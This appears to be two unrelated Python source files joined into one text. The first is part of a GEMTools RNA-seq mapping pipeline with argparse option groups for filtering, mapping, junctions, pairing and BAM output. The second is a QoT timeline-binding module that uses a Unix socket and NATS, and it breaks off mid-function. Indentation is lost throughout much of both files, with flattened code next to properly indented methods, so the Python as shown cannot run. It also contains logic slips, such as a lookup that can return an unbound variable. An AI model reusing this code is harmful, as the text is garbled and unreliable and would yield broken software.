for step in self.steps:
step.cleanup()
time.stop("Completed in %s", loglevel=None)
logging.gemtools.gt("Step Times")
logging.gemtools.gt("-------------------------------------")
for s in self.steps:
if s.id in times:
logging.gemtools.gt("{0:>25} : {1}".format(s.name, times[s.id]))
else:
logging.gemtools.gt("{0:>25} : skipped".format(s.name))
logging.gemtools.gt("-------------------------------------")
logging.gemtools.gt("Pipeline run finshed in %s", time.end)
def cleanup(self):
"""Delete all remaining temporary and intermediate files
"""
pass
def create_file_name(self, suffix, name_suffix=None, file_suffix="map", final=False):
"""Create a result file name"""
file = ""
if final:
suffix = None
if name_suffix is None:
name_suffix = ""
if suffix is not None and len(suffix) > 0:
file = "%s/%s%s_%s.%s" % (self.output_dir, self.name, name_suffix, suffix, file_suffix)
else:
file = "%s/%s%s.%s" % (self.output_dir, self.name, name_suffix, file_suffix)
if (self.compress_all or final and self.compress) and file_suffix in ["map", "fastq"]:
file += ".gz"
return file
def gtf_junctions(self):
"""check if there is a .junctions file for the given annotation, if not,
create it. Returns a tuple of the set of junctions and the output file.
"""
if self.annotation is None:
return (None, None)
timer = Timer()
gtf_junctions = self.annotation + ".junctions"
out = None
junctions = None
if os.path.exists(gtf_junctions):
logging.gemtools.info("Loading existing junctions from %s" % (gtf_junctions))
out = gtf_junctions
junctions = set(gem.junctions.from_junctions(gtf_junctions))
else:
out = self.create_file_name("gtf", file_suffix="junctions")
if os.path.exists(out):
logging.gemtools.info("Loading existing junctions from %s" % (out))
junctions = set(gem.junctions.from_junctions(out))
else:
logging.gemtools.info("Extracting junctions from %s" % (self.annotation))
junctions = set(gem.junctions.from_gtf(self.annotation))
gem.junctions.write_junctions(junctions, out, self.index)
logging.gemtools.info("%d Junctions from GTF" % (len(junctions)))
timer.stop("GTF-Junctions prepared in %s")
return (junctions, out)
def register_parameter(self, parser):
"""Register all parameters with the given
arparse parser"""
self.register_general(parser)
self.register_output(parser)
self.register_filtering(parser)
self.register_counts(parser)
self.register_mapping(parser)
self.register_transcript_mapping(parser)
self.register_junctions(parser)
self.register_pairing(parser)
self.register_bam(parser)
self.register_stats(parser)
self.register_execution(parser)
def register_counts(self, parser):
"""Register all filtering parameters with given
argparse parser
parser -- the argparse parser
"""
counts_group = parser.add_argument_group('GTF gene counts and stats')
counts_group.add_argument('--no-count', dest="counts_create",
action="store_false", default=True,
help='''Do not create GTF stats and counts results''')
counts_group.add_argument('--count-no-weights', dest="counts_weighted",
action="store_false", default=True,
help='''Do not weight multimap and multi gene hits but overcount''')
counts_group.add_argument('--count-unique-only', dest="counts_multimaps",
action="store_false", default=True,
help='''Do not considere multi-maps for counting''')
counts_group.add_argument('--count-exon-threshold', dest="counts_exon_threshold",
default=1.0, type=float,
help='''Minimum overlap of a mapping with exonic region to be counted for a gene''')
def register_filtering(self, parser):
"""Register all filtering parameters with given
argparse parser
parser -- the argparse parser
"""
filtering_group = parser.add_argument_group('Filtering and Scoring')
filtering_group.add_argument('-S', '--scoring', dest="scoring_scheme", metavar="scheme", help='''The scoring scheme to use. Default %s''' % str(self.scoring_scheme))
filtering_group.add_argument('--filter-max-matches', dest="filter_max_matches", metavar="max_matches", type=int, help='''Maximum number of printed matches. Default %d''' % self.filter_max_matches)
filtering_group.add_argument('--filter-min-strata', dest="filter_min_strata", metavar="min_strata", type=int, help='''Minimum number of printed strata. Default %d''' % self.filter_min_strata)
filtering_group.add_argument('--filter-max-strata', dest="filter_max_strata", metavar="max_strata", type=int, help='''Maximum number of printed strata. Default %d''' % self.filter_max_strata)
filtering_group.add_argument('--no-filtered', dest="filtered_create",
action="store_false", default=True,
help='''Do not create filtered results''')
filtering_group.add_argument('--no-annotation-filter', dest="filter_annotation",
action="store_false", default=True,
help='''Do not filter by annotation. The annotation
filter checks that pairs and splits fall into the same gene
(assuming the gene_id is set in the annotation)''')
filtering_group.add_argument('--filter-intron-length', dest="filter_intron_length",
default=self.filter_intron_length,
help='''Filter multimaps preferring ones with intron
length > threshold''')
filtering_group.add_argument('--filter-block-length', dest="filter_block_length",
default=self.filter_block_length,
help='''Filter multimaps preferring ones with block
length > threshold''')
filtering_group.add_argument('--filter-level', dest="filter_level",
default=self.filter_level,
help='''Reduce multimaps using the specified uniqueness level.
Set this to -1 to disable''')
filtering_group.add_argument('--filter-max-multi-maps', dest="filter_max_multi_maps",
default=self.filter_max_multi_maps,
help='''Set multi-maps with more than <threshold> mappings to unmapped.
Set this to -1 to disable''')
filtering_group.add_argument('--filter-max-error-events', dest="filter_max_error_events",
default=self.filter_max_error_events,
help='''Set maps with more than <threshold> error events to unmapped.
Set this to 0 to disable''')
def register_bam(self, parser):
"""Register all bam parameters with given
argparse parser
parser -- the argparse parser
"""
bam_group = parser.add_argument_group('BAM conversion')
bam_group.add_argument('--map-quality', dest="bam_mapq", default=self.bam_mapq, type=int, help="Filter resulting bam for minimum map quality, Default %d" % self.bam_mapq)
bam_group.add_argument('--no-xs', dest="calc_xs", action="store_false", default=None, help="Do not calculate the XS field")
bam_group.add_argument('--no-bam', dest="bam_create", action="store_false", default=None, help="Do not create bam file")
bam_group.add_argument('--no-bam-sort', dest="bam_sort", action="store_false", default=None, help="Do not sort bam file")
bam_group.add_argument('--no-bam-index', dest="bam_index", action="store_false", default=None, help="Do not index the bam file")
bam_group.add_argument('--no-sequence-header', dest="sam_no_seq_header", action="store_true", default=None, help="Do not add the reference sequence header to the sam/bam file")
bam_group.add_argument('--compact', dest="sam_compact", action="store_true", default=None, help="Create sam/bam compact format where each read is represented as a single line and any multi-maps are encoded in extra fields. The selection is based on the score.")
bam_group.add_argument('--sort-memory', dest="sort_memory", default=self.sort_memory, metavar="mem", help="Memory used for samtools sort per thread. Suffix K/M/G recognized. Default %s" % (str(self.sort_memory)))
def register_general(self, parser):
"""Register all general parameters with the given
argparse parser
parser -- the argparse parser
"""
input_group = parser.add_argument_group('Input')
## general pipeline paramters
input_group.add_argument('-f', '--files', dest="input", nargs="+", metavar="input",
help='''Single fastq input file or both files for a paired-end run separated by space.
Note that if you specify only one file, we will look for the file containing the other pairs
automatically and start a paired-end run. Add the --single-end parameter to disable
pairing and file search. The file search for the second pair detects pairs
ending in [_|.|-][0|1|2].[fq|fastq|txt][.gz].''')
input_group.add_argument('--single-end', dest="single_end", action="store_true", default=None, help="Single end reads")
input_group.add_argument('-q', '--quality', dest="quality", metavar="quality",
default=self.quality, help='Quality offset. 33, 64 or "ignore" to disable qualities.')
input_group.add_argument('-i', '--index', dest="index", metavar="index", help='Path to the .gem genome index')
input_group.add_argument('--direct-input', dest="direct_input", default=None, action="store_true", help="Skip preparation step and pipe the input directly into the first mapping step")
def register_output(self, parser):
"""Register all output parameters with the given
argparse parser
parser -- the argparse parser
"""
output_group = parser.add_argument_group('Output')
output_group.add_argument('-n', '--name', dest="name", metavar="name", help="""Name used for the results. If not specified, the name is inferred from
the input files""")
output_group.add_argument('-o', '--output-dir', dest="output_dir", metavar="dir", help='Optional output folder. If not specified the current working directory is used.')
output_group.add_argument('-g', '--no-gzip', dest="compress", action="store_false", default=None, help="Do not compress final mapping file")
output_group.add_argument('--compress-all', dest="compress_all", action="store_true", default=None, help="Compress all intermediate output")
output_group.add_argument('--keep-temp', dest="remove_temp", action="store_false", default=None, help="Keep temporary files")
def register_execution(self, parser):
"""Register the execution mapping parameters with the
given arparse parser
parser -- the argparse parser
"""
execution_group = parser.add_argument_group('Execution')
execution_group.add_argument('--save', dest="write_config", nargs="?", const=None, help="Write the given configuration to disk")
execution_group.add_argument('--dry', dest="dry", action="store_true", default=None, help="Print and write configuration but do not start the pipeline")
execution_group.add_argument('--load', dest="load_configuration", default=None, metavar="cfg", help="Load pipeline configuration from file")
execution_group.add_argument('--run', dest="run_steps", type=int, default=None, nargs="+", metavar="cfg", help="Run given pipeline steps idenfified by the step id")
execution_group.add_argument('--force', dest="force", default=None, action="store_true", help="Force running all steps and skip checking for completed steps")
execution_group.add_argument('-t', '--threads', dest="threads", metavar="threads", type=int, help="Number of threads to use. Default %d" % self.threads)
def register_mapping(self, parser):
"""Register the genome mapping parameters with the
given arparse parser
parser -- the argparse parser
"""
# genome mapping parameter
mapping_group = parser.add_argument_group('General mapping parameters')
mapping_group.add_argument('-s', '--strata-after-best', dest="genome_strata_after_best", type=int, metavar="strata", help='The number of strata examined after the best one. Default %d' % (self.genome_strata_after_best))
mapping_group.add_argument('-m', '--mismatches', dest="genome_mismatches", metavar="mm", help='Set the allowed mismatch ratio as 0 < mm < 1. Default %s' % (str(self.genome_mismatches)))
mapping_group.add_argument('--quality-threshold', dest="genome_quality_threshold", type=int, metavar="qth", help='Good quality threshold. Bases with a quality score >= threshold are considered good. Default %d' % self.genome_quality_threshold)
mapping_group.add_argument('--max-decoded-matches', dest="genome_max_decoded_matches", metavar="mdm", help='Maximum decoded matches. Default %d' % (self.genome_max_decoded_matches))
mapping_group.add_argument('--min-decoded-strata', dest="genome_min_decoded_strata", metavar="mds", help='Minimum decoded strata. Default to %d' % self.genome_min_decoded_strata)
mapping_group.add_argument('--min-matched-bases', dest="genome_min_matched_bases", metavar="mmb", help='Minimum ratio of bases that must be matched. Default %d' % (self.genome_min_matched_bases))
mapping_group.add_argument('--max-edit-distance', dest="genome_max_edit_distance", metavar="med", help='Maximum edit distance (ratio) allowed for an alignment. Default %s' % (str(self.genome_max_edit_distance)))
mapping_group.add_argument('--mismatch-alphabet', dest="genome_mismatch_alphabet", metavar="alphabet", help='The mismatch alphabet. Default "%s"' % (self.genome_mismatch_alphabet))
def register_transcript_mapping(self, parser):
"""Register the transcript mapping parameters with the
given arparse parser
parser -- the argparse parser
"""
# transcript mapping parameter
transcript_mapping_group = parser.add_argument_group('Transcript mapping parameters')
transcript_mapping_group.add_argument('-a', '--annotation', dest="annotation", metavar="gtf", help='''Path to the GTF annotation. If specified the transcriptome generated from the annotation is
used in addition to de-novo junctions.''')
transcript_mapping_group.add_argument('-r', '--transcript-index', dest="transcript_index", help='''GTF Transcriptome index. If not specified and an annotation is given,
it is assumed to be <gtf>.junctions.gem''')
transcript_mapping_group.add_argument('-k', '--transcript-keys', dest="transcript_keys", help='''Transcriptome .keys file. If not specified and an annotation is given,
it is assumed to be <gtf>.junctions.keys''')
transcript_mapping_group.add_argument('-tm', '--transcript-mismatches', dest="transcript_mismatches", metavar="mm", help='Set the allowed mismatch ratio as 0 < mm < 1. Default to genome setting.')
transcript_mapping_group.add_argument('--transcript-quality-threshold', dest="transcript_quality_threshold", metavar="qth", help='Good quality threshold. Bases with a quality score >= threshold are considered good. Default to genome setting.')
transcript_mapping_group.add_argument('--transcript-max-decoded-matches', dest="transcript_max_decoded_matches", metavar="mdm", help='Maximum decoded matches. Default %d' % (self.transcript_max_decoded_matches))
transcript_mapping_group.add_argument('--transcript-min-decoded-strata', dest="transcript_min_decoded_strata", metavar="mds", help='Minimum decoded strata. Default to genome setting.')
transcript_mapping_group.add_argument('--transcript-min-matched-bases', dest="transcript_min_matched_bases", metavar="mmb", help='Minimum ratio of bases that must be matched. Default to genome setting.')
transcript_mapping_group.add_argument('--transcript-max-edit-distance', dest="transcript_max_edit_distance", metavar="med", help='Maximum edit distance (ratio) allowed for an alignment. Default to genome setting.')
transcript_mapping_group.add_argument('--transcript-mismatch-alphabet', dest="transcript_mismatch_alphabet", metavar="alphabet", help='The mismatch alphabet. Default to genome setting.')
transcript_mapping_group.add_argument('--transcript-strata-after-best', dest="transcript_strata_after_best", metavar="strata", help='The number of strata examined after the best one. Default to genome setting.')
transcript_mapping_group.add_argument('--max-read-length', dest="max_read_length", type=int, help='''The maximum read length. This is used to create the de-novo
transcriptome and acts as an upper bound. Default auto-detect''')
def register_junctions(self, parser):
"""Register the junction detection parameter with the
given arparse parser
parser -- the argparse parser
"""
# junction detection parameter
junctions_group = parser.add_argument_group('De-novo junction detection parameters')
junctions_group.add_argument('-jm', '--junction-mismatches', dest="junction_mismatches", metavar="jmm",
help='Set the allowed mismatch ratio for junction detection as 0 < mm < 1. Default %s' % (str(self.junction_mismatches)))
junctions_group.add_argument('--junction-max-matches', dest="junctions_max_junction_matches", metavar="mm",
help='Maximum number of multi-maps allowed for a junction. Default %d' % (self.junctions_max_junction_matches))
junctions_group.add_argument('--min-intron-size', dest="junctions_min_intron_size", type=int, metavar="mil", help='Minimum intron length. Default %d' % self.junctions_min_intron_size)
junctions_group.add_argument('--max-intron-length', dest="junctions_max_intron_size", type=int, metavar="mil", help='Maximum intron length. Default %d' % self.junctions_max_intron_size)
junctions_group.add_argument('--refinement-step', dest="junctions_refinement_step_size", metavar="r", help='Refine the minimum split size when constraints on number of candidates are not met. Default %d' % self.junctions_refinement_step_size)
junctions_group.add_argument('--min-split-size', dest="junctions_min_split_size", type=int, metavar="mss", help='Minimum split length. Default 15')
junctions_group.add_argument('--matches-threshold', dest="junctions_matches_threshold", metavar="mt", help='Maximum number canidates considered when splitting the read. Default 75')
junctions_group.add_argument('--junction-coverage', dest="junctions_coverage", type=int, metavar="jc", help='Minimum allowed junction converage. Default %d' % self.junctions_coverage)
junctions_group.add_argument('--junction-consensus', dest="junctions_consensus", metavar="jc", help='Consensus used to detect junction sites. Default \'%s\'' % (",".join(["(%s,%s)" % (c[0], c[1]) for c in self.junctions_consensus])))
junctions_group.add_argument('--junction-strata-after-best', dest="junctions_strata_after_best", metavar="s", help='Maximum number of strata to examin after best. Default %d' % (self.junctions_strata_after_best))
def register_pairing(self, parser):
"""Register the pairing parameter with the
given arparse parser
parser -- the argparse parser
"""
pairing_group = parser.add_argument_group('Pairing parameters')
pairing_group.add_argument('--pairing-quality-threshold', dest="pairing_quality_threshold", metavar="pq", help='Good quality threshold. Bases with a quality score >= threshold are considered good. Defaults to genome setting.')
pairing_group.add_argument('--pairing-max-decoded-matches', dest="pairing_max_decoded_matches", metavar="pdm", help='Maximum decoded matches. Default %d' % self.pairing_max_decoded_matches)
pairing_group.add_argument('--pairing-min-decoded-strata', dest="pairing_min_decoded_strata", metavar="pds", help='Minimum decoded strata. Default to %d' % self.pairing_min_decoded_strata)
pairing_group.add_argument('--pairing-min-insert-size', dest="pairing_min_insert_size", metavar="is", help='Minimum insert size allowed for pairing. Default %d' % self.pairing_min_insert_size)
pairing_group.add_argument('--pairing-max-insert-size', dest="pairing_max_insert_size", metavar="is", help='Maximum insert size allowed for pairing. Default to max intron size')
def register_stats(self, parser):
"""Register stats parameter with the
given arparse parser
parser -- the argparse parser
"""
stats_group = parser.add_argument_group('Stats')
stats_group.add_argument('--no-stats', dest="stats_create", default=None, action="store_false", help='Skip creating stats')
stats_group.add_argument('--stats-json', dest="stats_json", default=None, action="store_true", help='Write a json file with the statistics in addition to the normal stats output.')
|
sherlock_qot_transform_traffic.py
|
# @file sherlock_qot_transform_traffic.py
# @brief Sherlock QoT Python Transform for Traffic Input
# @author Anon D'Anon
#
# Copyright (c) Anon, 2018.
# Copyright (c) Anon Inc., 2018.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# System calls
import sys
# Argument Parsing
import argparse
# Signal Handlers
import signal
# Module to Read Core Time
import time
# For Type Checking
import inspect
# For Spawning Threads and using Mutex Locks
from threading import Thread, Lock
# JSON Serialization/De-serialization
import json
# Import AsyncIO
import asyncio
# Import Socket Library
import socket
# Import the Math Library
import math
# Import Array Library
import array
# Import OS functionality
import os
# Share Memory
import mmap
# Import C-Style Structs
import struct
# NATS Python 3 Client
from nats.aio.client import Client as NATS
from nats.aio.errors import ErrConnectionClosed, ErrTimeout, ErrNoServers
# Enum Type
from enum import Enum
# Maximum number of clock-parameter sets retained in the ring buffer.
MAX_RING_BUFFER_SIZE = 10
# Base path of the unix domain socket used to talk to the timeline service.
TL_SOCKET_PATH = "/tmp/qot_timeline"
# Module-level flag indicating whether the binding has been initialized.
initialized = False
class ReturnTypes(Enum):
    """Status codes returned by timeline binding operations."""

    QOT_RETURN_TYPE_OK = 0        # operation succeeded
    QOT_RETURN_TYPE_ERR = 1       # generic failure
    QOT_RETURN_TYPE_CONN_ERR = 2  # could not talk to the timeline service

    def __int__(self):
        """Support int() so codes can be embedded in JSON payloads."""
        return self.value
class TimelineMessageTypes(Enum):
    """Request codes understood by the QoT timeline service."""

    TIMELINE_CREATE = 0       # create a timeline
    TIMELINE_DESTROY = 1      # destroy a timeline
    TIMELINE_UPDATE = 2       # update timeline binding parameters
    TIMELINE_BIND = 3         # bind to a timeline
    TIMELINE_UNBIND = 4       # unbind from a timeline
    TIMELINE_QUALITY = 5      # get the QoT spec for this timeline
    TIMELINE_INFO = 6         # get the timeline info
    TIMELINE_SHM_CLOCK = 7    # get the timeline clock rd-only shm fd
    TIMELINE_SHM_CLKSYNC = 8  # get the timeline clock shm fd
    TIMELINE_UNDEFINED = 9    # undefined function

    def __int__(self):
        """Support int() so message types can be embedded in JSON payloads."""
        return self.value
class TimelineTypes(Enum):
    """Kinds of timelines a binding can attach to."""

    QOT_TIMELINE_LOCAL = 0   # Local Timeline -> Internal or External Reference
    QOT_TIMELINE_GLOBAL = 1  # Global Timeline -> Tied to UTC

    def __int__(self):
        """Support int() conversion for serialization."""
        return self.value
class RingBuffer:
    """Thread-safe ring buffer that fills up before it starts overwriting.

    Elements are appended to a plain list until ``size_max`` entries are
    stored; at that point the instance's class is swapped to the internal
    ``__Full`` variant, whose ``append`` overwrites the oldest entry.
    """

    def __init__(self, size_max):
        self.max = size_max
        self.data = []
        self.mutex = Lock()

    class __Full:
        """Behaviour of a buffer that has reached capacity."""

        def append(self, x):
            """Overwrite the oldest element with *x*."""
            with self.mutex:
                self.data[self.cur] = x
                self.cur = (self.cur + 1) % self.max

        def get(self):
            """Return the elements ordered from oldest to newest."""
            with self.mutex:
                return self.data[self.cur:] + self.data[:self.cur]

    def append(self, x):
        """Append *x*; switch to the full implementation at capacity."""
        print("Added data to ring buffer")
        with self.mutex:
            self.data.append(x)
            if len(self.data) == self.max:
                self.cur = 0
                # permanently swap this instance's class to the full variant
                self.__class__ = self.__Full

    def get(self):
        """Return all stored elements, oldest first."""
        with self.mutex:
            return self.data
class TimelineBinding:
"""TimelineBinding class lets apps bind to a timeline and perform various
time-related operations on the timeline"""
def __init__(self, mode="app"):
# Set the Mode as "transform" or "app"
self._mode = mode
# Initialize Timeline Parameters
self._timeline_uuid = None # Timeline UUID (Unique name)
self._timeline_type = "local" # Timeline type (local or global)
self._timeline_index = -1 # Timeline ID
# Initialize Binding Parameters
self._binding_name = None # Binding Name
self._binding_id = -1 # Binding ID
self._accuracy_ns = None # Accuracy Specification in nanoseconds
self._resolution_ns = None # Resolution Specification in nanoseconds
# Initialize Scheduling Parameters
self._offset_ns = 0 # Scheduling Offset
self._period_ns = 0 # Scheduling Period
# Initialize AsyncIO Loop
if mode == "transform":
self._loop = asyncio.get_event_loop()
# Else: mode defaults to "app"
####### Private Functions #######
# Decorator 1 to Perform Type Checking
def checkargs(function):
def _f(*arguments):
for index, argument in enumerate(inspect.getfullargspec(function)[0]):
if not isinstance(arguments[index], function.__annotations__[argument]):
raise TypeError("{} is not of type {}".format(arguments[index], function.__annotations__[argument]))
return function(*arguments)
_f.__doc__ = function.__doc__
return _f
# Decorator 2 to Perform Type Checking
def coerceargs(function):
def _f(*arguments):
new_arguments = []
for index, argument in enumerate(inspect.getfullargspec(function)[0]):
new_arguments.append(function.__annotations__[argument](arguments[index]))
return function(*new_arguments)
_f.__doc__ = function.__doc__
return _f
def _recv_fds(self, msglen, maxfds):
fds = array.array("i") # Array of ints
msg, ancdata, flags, addr = self._sock.recvmsg(msglen, socket.CMSG_LEN(maxfds * fds.itemsize))
for cmsg_level, cmsg_type, cmsg_data in ancdata:
if (cmsg_level == socket.SOL_SOCKET and cmsg_type == socket.SCM_RIGHTS):
# Append data, ignoring any truncated integers at the end.
fds.fromstring(cmsg_data[:len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
return msg, list(fds)
    def _send_timeline_msg(self):
        '''Send self._tl_msg to the QoT timeline service and read the reply.

        The message is JSON-encoded and written to the connected socket.
        For all message types except TIMELINE_SHM_CLOCK the reply is read
        back in MAX_BUF_LEN chunks, decoded into self._tl_msg, and its
        "retval" field is returned. A connection-error code is returned
        when sending or receiving fails.
        '''
        # Convert message to JSON
        message = json.dumps(self._tl_msg)
        # Send message to timeline service
        bytesSent = self._sock.send(message.encode())
        # Maximum message size to receive in one go
        MAX_BUF_LEN = 4096
        # Received Message
        msg_recv = ""
        recv_flag = False
        # Wait for a response from the timeline service; the shm-clock
        # request is answered with a file descriptor (not JSON), so it is
        # deliberately excluded here
        if bytesSent > 0 and self._tl_msg["msgtype"] != int(TimelineMessageTypes.TIMELINE_SHM_CLOCK):
            amount_received = MAX_BUF_LEN
            # keep reading while full buffers arrive; a short read marks
            # the end of the reply
            while amount_received == MAX_BUF_LEN:
                data = self._sock.recv(MAX_BUF_LEN).decode()
                amount_received = len(data)
                msg_recv = msg_recv + data
                recv_flag = True
            # Possible error in receiving message
            if recv_flag == False:
                print ('Could not receive data from service')
                return ReturnTypes.QOT_RETURN_TYPE_CONN_ERR
            # Decode Message from JSON
            self._tl_msg = json.loads(msg_recv)
            return self._tl_msg["retval"]
        elif bytesSent == 0:
            print ('Failed to send message to service')
            self._tl_msg["retval"] = int(ReturnTypes.QOT_RETURN_TYPE_CONN_ERR)
            return self._tl_msg["retval"]
        else: # Message request to get clock shared memory
            self._tl_msg["retval"] = int(ReturnTypes.QOT_RETURN_TYPE_OK)
            return self._tl_msg["retval"]
        # NOTE(review): unreachable -- every branch above returns
        return ReturnTypes.QOT_RETURN_TYPE_ERR
def _populate_timeline_msg_data(self):
'''Populate the fields of the timeline message based on the instance parameters'''
self._tl_msg = dict()
# Timeline Information
self._tl_msg["info"] =dict()
self._tl_msg["info"]["index"] = self._timeline_index
self._tl_msg["info"]["type"] = int(self._tl_type)
self._tl_msg["info"]["name"] = self._timeline_uuid
# Binding Information
self._tl_msg["binding"] = dict()
self._tl_msg["binding"]["name"] = self._binding_name
self._tl_msg["binding"]["id"] = self._binding_id;
# QoT Requirements
self._tl_msg["demand"] = dict()
self._tl_msg["demand"]["resolution"] = dict()
self._tl_msg["demand"]["resolution"]["sec"] = int(math.floor(self._resolution_ns/1000000000))
self._tl_msg["demand"]["resolution"]["asec"] = int((self._resolution_ns % 1000000000)*1000000000)
self._tl_msg["demand"]["accuracy"] = dict()
self._tl_msg["demand"]["accuracy"]["above"] = dict()
self._tl_msg["demand"]["accuracy"]["below"] = dict()
self._tl_msg["demand"]["accuracy"]["above"]["sec"] = int(math.floor(self._accuracy_ns/1000000000))
self._tl_msg["demand"]["accuracy"]["above"]["asec"] = int((self._accuracy_ns % 1000000000)*1000000000)
self._tl_msg["demand"]["accuracy"]["below"]["sec"] = int(math.floor(self._accuracy_ns/1000000000))
self._tl_msg["demand"]["accuracy"]["below"]["asec"] = int((self._accuracy_ns % 1000000000)*1000000000)
def _populate_timeline_msg_type(self, msg_type: TimelineMessageTypes):
    '''Stamp the pending timeline message with its request type and reset
    the return code to the generic error value (the service overwrites it
    on success).'''
    self._tl_msg["msgtype"] = int(msg_type)
    self._tl_msg["retval"] = int(ReturnTypes.QOT_RETURN_TYPE_ERR)
def _nats_subscribe(self):
    '''Generator-based coroutine: subscribe to this timeline's clock-parameter
    subject on NATS and feed each received parameter set into the ring buffer.

    Runs until self._nats_thread_running is cleared (by timeline_unbind),
    then closes the NATS connection.'''
    self._nc = NATS()
    # Connect to the NATS Server (in-cluster Kubernetes service DNS name)
    yield from self._nc.connect(servers=["nats://nats.default.svc.cluster.local:4222"], io_loop=self._loop)
    @asyncio.coroutine
    def message_handler(msg):
        # Invoked for every message published on the params subject
        subject = msg.subject
        reply = msg.reply
        data = msg.data.decode()
        print("Received a message on '{subject} {reply}': {data}".format(
            subject=subject, reply=reply, data=data))
        # Parse the received JSON
        params = json.loads(data)
        # Add the latest parameters to the ring buffer
        self._param_ring_buf.append(params)
    # Simple publisher and async subscriber via coroutine.
    tl_subject = "qot." + "timeline." + self._timeline_uuid + ".params"
    sid = yield from self._nc.subscribe(tl_subject, cb=message_handler)
    # Loop until the process unbinds from timeline
    while self._nats_thread_running:
        yield from asyncio.sleep(1, loop=self._loop)
    # Disconnect from NATS Server
    yield from self._nc.close()
def _dispatch_nats(self):
    '''Thread handler: seed the clock-parameter ring buffer with an identity
    transform, then run the NATS subscriber on this thread's asyncio loop.

    The initial all-zero entry guarantees _find_clkparams has at least one
    candidate before the first NATS update arrives.'''
    # Create a Ring Buffer of Clock Parameters
    self._param_ring_buf = RingBuffer(MAX_RING_BUFFER_SIZE)
    # Append initial value to ring buffer
    init_params = {"l_mult":0,"l_nsec":0,"last":0,"mult":0,"nsec":0,"u_mult":0,"u_nsec":0}
    self._param_ring_buf.append(init_params)
    # Run AsynIO Loop (blocks until _nats_subscribe returns on unbind)
    self._loop.run_until_complete(self._nats_subscribe())
def _find_clkparams(self, coretime):
'''Find the appropriate clock parameters based on the core time'''
# Get the list of stored parameters
param_list = self._param_ring_buf.get()
# Parse the param list to find the appropriate clock parameters
for list_params in reversed(param_list):
# Compare with "last" after converting "last" to fractional seconds
if coretime > list_params["last"]/1000000000:
params = list_params
break
return params
def _core2timeline(self, period_flag, coretime_ns, clk_params):
'''Convert from core time to timeline time'''
if period_flag:
tl_time = coretime_ns + int(clk_params[1]*coretime_ns)/1000000000;
else:
tl_time = coretime_ns - clk_params[0];
tl_time = clk_params[2] + tl_time + (int(clk_params[1]*tl_time)/1000000000);
return tl_time
def _timeline2core(self, period_flag, tltime_ns, clk_params):
'''Convert from timeline time to core time'''
if period_flag:
core_time = int(tltime_ns*1000000000)/(clk_params[1]+1000000000)
else:
diff = tltime_ns - clk_params[2]
quot = int(diff*1000000000)/(clk_params[1]+1000000000)
core_time = clk_params[0] + quot;
return core_time
def _compute_qot(self, coretime_ns, clk_params):
'''Compute the QoT estimates for the timestamp'''
upper_bound = int(clk_params[5]*(coretime_ns - clk_params[0]))/1000000000 + clk_params[3]
lower_bound = int(clk_params[6]*(coretime_ns - clk_params[0]))/1000000000 + clk_params[4]
return upper_bound, lower_bound
####### Public API Calls #######
@checkargs
def timeline_bind(self: object, timeline_uuid: str, app_name: str, res_ns: int, acc_ns: int):
    '''
    * @brief Bind to a timeline with a given resolution and accuracy
    * @param timeline_uuid Name of the timeline
    * @param app_name Name of this binding
    * @param res_ns Maximum tolerable unit of time in nanoseconds
    * @param acc_ns Maximum tolerable deviation from true time in nanoseconds
    * @return A status code indicating success (0) or other'''
    print("Binding to timeline %s" % timeline_uuid)
    # Cache the binding parameters on the instance
    self._timeline_uuid = timeline_uuid
    self._binding_name = app_name
    self._resolution_ns = res_ns
    self._accuracy_ns = acc_ns
    self._timeline_index = 0
    self._binding_id = -1
    # Timeline type: a "gl_" prefix marks the timeline as global
    if timeline_uuid.find("gl_") == 0:
        self._tl_type = TimelineTypes.QOT_TIMELINE_GLOBAL
    else:
        self._tl_type = TimelineTypes.QOT_TIMELINE_LOCAL
    # Return Value
    retval = ReturnTypes.QOT_RETURN_TYPE_OK
    if self._mode == "transform":
        # Transform mode: clock parameters arrive over NATS rather than the
        # local service socket. Start a new thread for NATS which runs AsyncIO.
        self._nats_thread_running = True # Flag to terminate thread
        self._nats_thread = Thread(target=self._dispatch_nats)
        self._nats_thread.start()
    else: # Assume App Mode
        # Create a UDS socket
        self._sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        # Connect the socket to the port where the qot-timeline-service is listening
        try:
            self._sock.connect(TL_SOCKET_PATH)
        except socket.error as msg:
            print (msg)
            retval = ReturnTypes.QOT_RETURN_TYPE_CONN_ERR
            return retval
        # Initialize Timeline service message
        self._populate_timeline_msg_data()
        # Send TIMELINE_CREATE message to timeline service
        self._populate_timeline_msg_type(TimelineMessageTypes.TIMELINE_CREATE)
        if self._send_timeline_msg() != int(ReturnTypes.QOT_RETURN_TYPE_OK):
            print ('Failed to send timeline metadata to timeline service')
            retval = ReturnTypes.QOT_RETURN_TYPE_ERR
            return retval
        else:
            # Service returns the (possibly pre-existing) timeline's index
            self._timeline_index = self._tl_msg["info"]["index"]
            print ('Timeline ID is %d' % self._timeline_index)
        # Send TIMELINE_BIND message to timeline service
        self._populate_timeline_msg_data()
        self._populate_timeline_msg_type(TimelineMessageTypes.TIMELINE_BIND)
        if self._send_timeline_msg() != int(ReturnTypes.QOT_RETURN_TYPE_OK):
            print ('Failed to send timeline metadata to timeline service')
